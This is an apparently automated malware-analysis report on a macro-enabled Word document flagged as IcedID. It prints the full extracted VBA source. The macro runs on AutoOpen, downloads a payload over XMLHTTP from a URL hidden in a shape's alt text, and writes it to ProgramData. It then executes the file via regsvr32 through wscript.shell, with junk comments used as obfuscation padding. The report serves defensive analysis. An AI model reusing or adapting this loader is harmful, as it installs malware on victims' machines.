MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set aGgOJ = CreateObject(IGYBU + "." + "shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Fdqqb = VBA.CreateObject(eYuXT + "" + lfZSM) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13932 bytes |
SHA-256: 8686e30c96a91cca5a6d71eb5dbd95aaf63cc1fccde5ef76e73b84650d966d4b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lcISL"
Sub VsyHu(RzHaK, Optional ByVal tlirJ As String = "c:\programdata\rOjqf.txt", Optional ByVal lfZSM As String = "systemobject")
' Contemptible aria
' Jockeys gallium oversupply
' Spaniel plopping
' Shifting vulgar
' Abstainer deserving
' Inlay covert
' Enrage turmoil wagers
' Wellchosen nicer sojourner
' Person extremists
' Reroutes aforementioned religiously relevantly
' Trivialisations homogenisation
' Darlings misogynistic spoon
' Unprotected algorithmically jump disallowing
' Cosmos upbraids shielded
' Etymological oppression warn
' Passwords annoyance exempt
' Gravitated freedom converse
' Presidencies trudged financing sexists
' Ledge unmonitored acquiesced shuttles furthering
' Hill subjectivity
' Academy miami patters feminism lanyard
' Natives aerobatics transactor deportee copulatory
' Prosperously worriedly hopefully
' Backpedalled rejected desiring
' Leafing tracheostomy librated
' Aegina revoke occurrence outsmart
Set Fdqqb = VBA.CreateObject(eYuXT + "" + lfZSM)
' Novelist emitted receiver
' Colloquium disadvantages mauler announcing
' Pundits ravaged overdoing ruinous basal producer mortals
' Bisect reader attics
' Misrepresents peahens
Set EdMnF = Fdqqb.CreateTextFile(tlirJ)
' Subsurface filth dubiously
' Bobbins palming defaults
' Mystified riffs striking true affably
' Botulism polarisation pleasures equatorial
' Republication recently phlegmatically
' Perturbed bates
' Kwachas okays
' Approves tyrannically streetwalkers peacefully
EdMnF.WriteLine RzHaK
' Applicator exponents invasion markups
' Scuba dried gun swindles declination lamenter
' Housebuilder juggler
' Redoubtable triathlon predicting terminate phonological
' Shamefaced revels artier prettiest peeps floozie guardedly
' Updates zooming trollish baiters moonlighting
EdMnF.Close
' Revises fabrication transpires obeying
' Inscribed
' Polony higgledypiggledy
' Longlasting
' Alder pettishly tsetse
' Micrograph chancel covets
' Androids buttressed glide
' Ruffs leavers dementedly
' Mulches circumvents unpersuaded rerouted
' Technophobia smidgeon
' Poked manifest encircled imploded swindled trilling
' Miscellany inaudibility fidelity interest
' Whalers
' Tactlessness relativity canvassed
' Sycophantically obey unanimously
' Eritrea seminaries psychiatrist vulnerabilities
' Trod reverses shies receivable unambiguous extractable prologue
' Terrifies
' Oversleep sands delay motley
' Unmerited oppresses surtitles absconder
' Dissension squirt listlessly
' Foregrounding sullenly
' Factual misled
' Protozoa darn regrouped fatter roosts
' Indemnity mammals
' Unhonoured schemas jihad wayside
' Reseller shakiest welldesigned faith
' Irk arboreal exultantly inexactitudes
' Cleanliness keeps emancipating nave moonshots
' Tweedy ambushed
' Modelled manic unbelievability tank
' Headless
' Spanner quenches sunflower replicas
' Saluting sieved tipoffs
' Factious overcommitments
' Ostensibly precluding promiscuity charmless victors predicative inconceivably
' Stakes logarithmically
' Psalmody psychotherapy disinclination
End Sub
' Obscured auburn incests roar
' Telegrams iniquity argot thirstier lapland his
' Lazaret dumping outgrow compiled romantic
' Admiral computerliterate stress locomotive regale
' Uncanny friskiest substance
Sub AutoOpen()
' Bitch
' Contexts causality pandas sheerness
' Cabal nipper
' Cybernetic seep backer crosschecks floggers
' Oversight
' Wobbliest soiling tricking
' Fulsome anthropogenically decoratively
' Uncured anaemic
' Deregulation carbines heathens
' Reinforced october tether
' Palisades will thoughtprovoking reach
' Pulsar peru appeasers alluvia
' Aerodynamics malefactor peer maturer
' Catcher unbalances
' Graves inflowing haggled
' Fun embargoed
' Moreover whip cysts
' Ventrally rolls oracle
' Soloists minuses prefaces predisposing billions tied outflow
' Plaids weekdays hangglider
' Atrociously untended
' Tiniest pageant dentition
' Armenia simultaneous rhythms tennis smudgier stepsister
' Technologies optimisation
' Anchor normalised
' Rotational bicycles ergodic
' Ability editors
Dim AGGfb As New gUwvT
' Weird thriftless
' Backups assailant dynamite
' Strengthen tsunami provocation circumferences shore
' Badgering salesperson
zqgQB = ""
' Taxable coons
' Conceptually basilica philatelists alternates
' Rib sails
' Reconstruction scientific refundable laymen obeyed
' Heartbreaking rye sightly neverending impending viaduct approximating
' Waterresistant coasted fortnights goaded
' Algebraic
' Elongates drearily
' Observances cuds dusty anecdotes exterior bunions
' Deathless sultan undisplayed harmlessness surround
' Rupees yore
RzHaK = AGGfb.alWvs(DHAdD)
' Bandiest picturesqueness fourthly noiselessly
' Reassessments slewed fecundity mastered
' Disquietude commitments mums squeamishness
' Generously
' Indicator
VsyHu WSYSj(RzHaK)
' Greened victimises apparitions
' Centimetres forwarded mutates tabbed
' Wavelengths scope
' Mate pipes fly caravanning
' Deem stereo
' Outplay shamefully
' Nohow worthily codicil
' Functional jest succinct soothsayers
' Catapults allotment
' Contiguously singeing tic unjammed hapless
' Mope juddered
WTZvL ayZJP(0) + "vr32 c:\programdata\rOjqf.txt", "wscript"
End Sub
Function Xxlue(fkzGl, aBkjX)
' Playmates dutchman
' Enjoyed kneedeep twirl
' Role measureless earliest linearity schoolboy
' Polyglots southwards patriotic stenographer brilliantly
' Televising corvettes pasteboard placates
Xxlue = Split(fkzGl, aBkjX)
End Function
Attribute VB_Name = "rwHET"
' Integrated unifiable secretariats callous
' Shampooing dielectric underfund ingenuous shelves
' Sigma fibbed deepfrozen
' Abscissa come frustrate landfall blatantly
' Recollects
' Similitude superglue
' Thematically revived conjectured hangup continuously
Function WSYSj(xCFJX)
' Superscript popper portability numbed
' Truncheons probabilistic
' Compassion monocular canoeing stylistically
' Multicoloured confers novices misfiled
' Stimulant
WSYSj = StrConv(xCFJX, vbUnicode)
' Satellite loser pause
' Appendicitis surgeons
' Germanic
' Unsaid cuddliness reasonable
' Hibernating latecomer creationist foundry
' Gatecrash posturing presuppositions
End Function
' Midevening sauerkraut javelin amount refuses
' Limp cascades rubble joiners cigar
' Multiracial
' Stodgy preserved punted consummated enters
' Slickness inquiringly meal
' Juggling debar categorises flowered
' Closable nominative clandestinely jesters wrappings
Function bwBEd()
' Refusals pelvic
' Escorting fornicator
' Ballot psychokinetic defrost
' Warning enunciating impede wellbuilt leeches
' Uhuh complains chewier selfpity
' Ruminatively palisades aired primogeniture afferent helicopter
' Risk brainwashed menacingly muffling doggerel
' Repatriate interjected bruises malted capsizes
' Typographers weekenders wellpreserved
' Radiographers craters
' Stirrups currency pushups sodomise
With ActiveDocument.shapes(1)
bwBEd = .AlternativeText
End With
End Function
' Glycol
' Caged
' Marketeers unsmilingly exclamatory
' Kingfisher cabby
' Namibia poundage lobbied inveiglers stiletto beers
' Vessel
Function ayZJP(NDqvx)
' Jumbled superhero handier
' Corralled ammonites
' Rovings unclear crocodiles netts
' Intercontinental variety jews sickening
' Subarctic topless lawabiding exuberant
' Moaner diphthongs trilled kilowatts inks
' Rooibos fund
' Banquets requited unmutilated heads
iWtIj = Xxlue(bwBEd(), "~~~")
iXAbx = iWtIj(NDqvx)
ayZJP = iXAbx
End Function
Attribute VB_Name = "gUwvT"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function XDGwo(kYIBR, qLDEV, LAXBf)
' Hinted lefthanded stuffiest goons code stoning sprouted
' Illconceived pave reuses reproaching
' Foulness dieting topped fratricidal
' Lacteal assertive
' Flexible marry android
' Archly dovecot brotherinlaw
XDGwo = Mid(kYIBR, qLDEV, LAXBf)
End Function
Public Function WpYes(fBjnv, spKWg)
' Subsumed clues cooperated bishoprics unfettered repositions
' Robbing reading
' Planetary
' Absence operetta escalators rubbles disaffection
' Safer unleashed mockers
' Transcendent taxpayers
' Pointblank epiphenomena nulls pricey
' Companion soothers compositional
' Seedier ominously
' Expend frogmen doctrines baiting
' Unpaired soberly swishy brisk ethic
' Scale lymphomas defiant rewrote
' Races jumping protegees greenhouse
' Neutraliser liquefied scuffling
' Distributed screechier predation
' Choppier keyboard versed westernmost taverns
' Desideratum
' Whitecollar panoramic reassess
' Predation
NTOrJ = Trim(fBjnv)
For EmYKd = spKWg To Len(NTOrJ)
MKYnQ = XDGwo(NTOrJ, EmYKd, spKWg) & MKYnQ
Next EmYKd
WpYes = MKYnQ
End Function
' Dockland personifications seclusion gradualist
' Freelance
' Amazons vaccinated voices disruption
' Grown hellfire effusion belong
Function alWvs(vyqet)
' Miscalculation squeezing leaden
' Nutmeg placemen
' Unorganised pollutants epigones
' Unadulterated disposers assimilating slushiest heirloom
' Disuse shammed leathery zealotry
' Hollowness
Dim XBsXz As Object
' Rebelliously blackmailer disrepute popper
' Reaction tapers mucous biogeographical
' Creative
' Badged
' Conferences redeemable
' Incoherence strutting
' Tinware hoping brasses gunfire psalmist expunging cupboard
' Mechanisms
' Withering dwindling incompetence flits humbled
' Prejudge dreadnought monumental outlining
' Swipe interpolates roses irregularities
' Dutchman anthologised iceland impregnation declassified
' Mac creepy cutter slightest formal
Set XBsXz = CreateObject(WpYes(vyqet, 1) + "." + WpYes(vyqet, 1) + "Request.5.1")
' Wordier tetanus chaos curricle papers
' Volcanic hypodermic
' Gulping optimisations everliving withstanding rejuvenations
' Dearest porpoise stewards
' Prickliest strangles
' Oddly ganger shortening journalist involute
' Semiconductors
' Dipsticks suspension outbuilding
' Annuals steer augite bowlers
' Monarchic spay
' Jimmy convicts battles waists
' Cress screechiest encroaches amplifier
' Scheme
' Resent bylaw paddle foretell proselytise
' Spuriously cursory amulets contractually
' Flabby quirks transporter overshadow
' Portrays food reassured actuator receiver
' Stutters taxonomist palatial
' Cumbersome rainfall invoiced
' Terseness insults
' Acolytes proletarians spanners
' Diploma entwined
' Foregrounding opioid rivets
' Recycle clampdown vortices
' Absolve adopted retort
KLaKb = ayZJP(1)
' Enslaves net identically
' Monopole striding
' Scrooge seniority surety incompressible brandishes
' Superiors indulgently
' Ceremoniously nagged
' Sowers poison mercifully dakoits
' Preside unrestrained dictatorships
XBsXz.Open "GET", WpYes(KLaKb, 1), False
' Sexton astral compassed
' Functionless vivisectionists
' Slacken gracefulness glueing
' Noisy
' Choke stapled epic microscope husbandman
' Unwarrantable inadvertently manifests
' Homage decked rewards
XBsXz.Send
' Adept disturbed
' Artisan pigtailed absolutists acidophiles
' Cooling hydrostatics lexicographic goth
' Paratroops posit valuation voltmeter
' Marshmallows traps
alWvs = XBsXz.responsebody
End Function
Attribute VB_Name = "FuESu"
Public Const DHAdD As String = "ptthniw"
Public Const eYuXT As String = "scripting.file"
Sub WTZvL(abSpW, IGYBU)
' Downgrades lolled hulls
' Operational northwards
' Floaty girlish sittings evaporator patrilineal
' Skerries delve warder
' Introduced forebrain glyphs mantissas explosive occidental
Set aGgOJ = CreateObject(IGYBU + "." + "shell")
' Unergonomic strikes teeniest slats long vellum
' Calculates contrition system
' Draperies workday predecessors murmurings
' Coven seceding giggly openers smirked
' Depleted amphibia proposes
' Ceramist guessable damply centimetres
' Hotblooded courteously with leagues entries
' Gravity impotent
' Troll consistently inmates
' Saturated unmaintainable pensioner sealed
' Explosions mollified trenches ultra lavender
' Tunnelling bunched malformations impersonal
' Prompted clampdown selfconsciousness
' Evokes shagged psycholinguists democrat arabians niceties
' Redefinitions unfit parabolic
' Tepee bogs
' Advantageously fiefs repetitive lumpy bawdier
' Cogitative lien synthesisers
' View enthalpy
' Overshot discomforts boiling
' Vouchsafed cranks baseless
' Paragons
' Blunted townspeople ghostlier frictional contraction
' Invading thickens memphis
' Inclement mummify meddle ulster
' Interferometry privilege
' Acutest cataloguer ballades pry tumescent brunts quebec
' Student pursues kiddie drudges
' Silty smoggy beheld inadvisable impeded
' Escapees cannonballs muslim departs
' Alms storming shack intaglio
' Empowerment gunsmiths soused
' Cubic amazon lamb coated
' Linger frizzles
' Applications mastectomy interceptions
' Headlights malingerers
' Classier perambulated
' Unstirred
' Inequalities animator chopped example
' Caramel
' Volubly
' Astutely prospecting rightmost
' Advertiser flanks panic arbitrary
' Revolutionising
Call aGgOJ.exec(abSpW)
' Twinned liniment inn toga dispenser forward
' Beatings solidity ordeals
' Stray trappable defectives antidepressants
' Loch sackfuls
' Revamps omission performable fingermarks embroiling
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 49664 bytes |
SHA-256: 20793eff2de9fc35a830c5df0efed9297314ab40cddbfcfd108cd0562d0b39ec |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.